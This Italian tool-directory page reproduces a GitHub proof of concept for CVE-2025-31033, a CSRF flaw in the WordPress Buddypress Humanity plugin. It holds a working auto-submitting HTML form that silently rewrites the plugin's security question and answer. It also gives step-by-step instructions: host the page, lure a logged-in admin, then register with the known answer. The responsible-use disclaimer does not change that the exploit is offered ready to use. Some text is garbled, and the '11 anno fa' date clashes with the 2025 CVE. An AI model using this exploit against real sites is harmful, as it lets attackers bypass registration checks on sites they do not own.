Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-31033 — WordPress Buddypress Humanity Plugin <= 1.2 è vulnerabile a Cross Site Request Forgery (CSRF) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-31033
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubnxploited/cve-2025-31033

CVE-2025-31033

WordPress Buddypress Humanity Plugin <= 1.2 è vulnerabile a Cross Site Request Forgery (CSRF)

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

⚠️ CVE-2025-31033 - CSRF nel plugin Buddypress Humanity per WordPress <= 1.2

🛡️ Riepilogo della vulnerabilità

Il plugin Buddypress Humanity per WordPress (versione <= 1.2) è vulnerabile a Cross-Site Request Forgery (CSRF).
Questa vulnerabilità consente a un attaccante di costringere un utente con privilegi più elevati (es. admin) a modificare inconsapevolmente le impostazioni del plugin (come la domanda di sicurezza e la risposta), aggirando la logica di verifica dell'utente.


🐞 Tipo di vulnerabilità

  • Cross Site Request Forgery (CSRF)
  • Componente interessato: pagina bph-settings (solo admin)
  • CVE: CVE-2025-31033
  • Rischi CVSS 9.8

🚨 Impatto

Se sfruttata con successo, questa vulnerabilità consente agli attaccanti di:

  • Modificare la domanda di sicurezza e la usate durante la registrazione dell'utente
risposta
  • Aggirare la verifica di umanità conoscendo la nuova risposta
  • Automatizzare la registrazione degli utenti (possibilmente combinata con escalation dei privilegi)
  • Abusare delle protezioni del modulo di registrazione senza interazione dell'utente

  • 🎯 Plugin interessato

    • Nome: Buddypress Humanity
    • Versione: ≤ 1.2
    • Slug: buddypress-humanity
    • Testato su: WordPress 6.x + BuddyPress attivo

    💥 Prova di concetto (Exploit HTML)

    root@kitploit:~
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Exploit – CVE-2025-31033</title>
    </head>
    <body onload="document.forms[0].submit();">
      <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
        <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
        <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
        <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
        <input type="hidden" name="bph_submit" value="1">
      </form>
    </body>
    </html>
    

    ☠️ Quando questa pagina viene aperta da un admin autenticato, modifica silenziosamente le impostazioni del plugin.


    🔧 Come sfruttare la vulnerabilità

    1. Ospita l'HTML del PoC su qualsiasi server esterno.
    2. Induci un admin WordPress autenticato a visitare la pagina.
    3. Alla visita, il suo browser invierà silenziosamente il modulo.
    4. La domanda di sicurezza e la risposta del plugin verranno aggiornate.
    5. L'attaccante può ora registrarsi usando la risposta nota.

    🧪 Uno sfruttamento riuscito comporta:

    • Domanda modificata: I’m Nxploited | Khaled Alenazi
    • Risposta modificata: Nxploit
    • Qualsiasi utente che inserisce "Nxploit" aggirerà la verifica.

    ⚠️ Disclaimer

    Questa prova di concetto è solo a scopo educativo.
    Usala in modo responsabile e non testare su sistemi che non possiedi.
    L'autore non è responsabile per qualsiasi uso improprio o danno causato.


    👤 Autore

    Nxploited | Khaled Alenazi

    Scarica lo strumento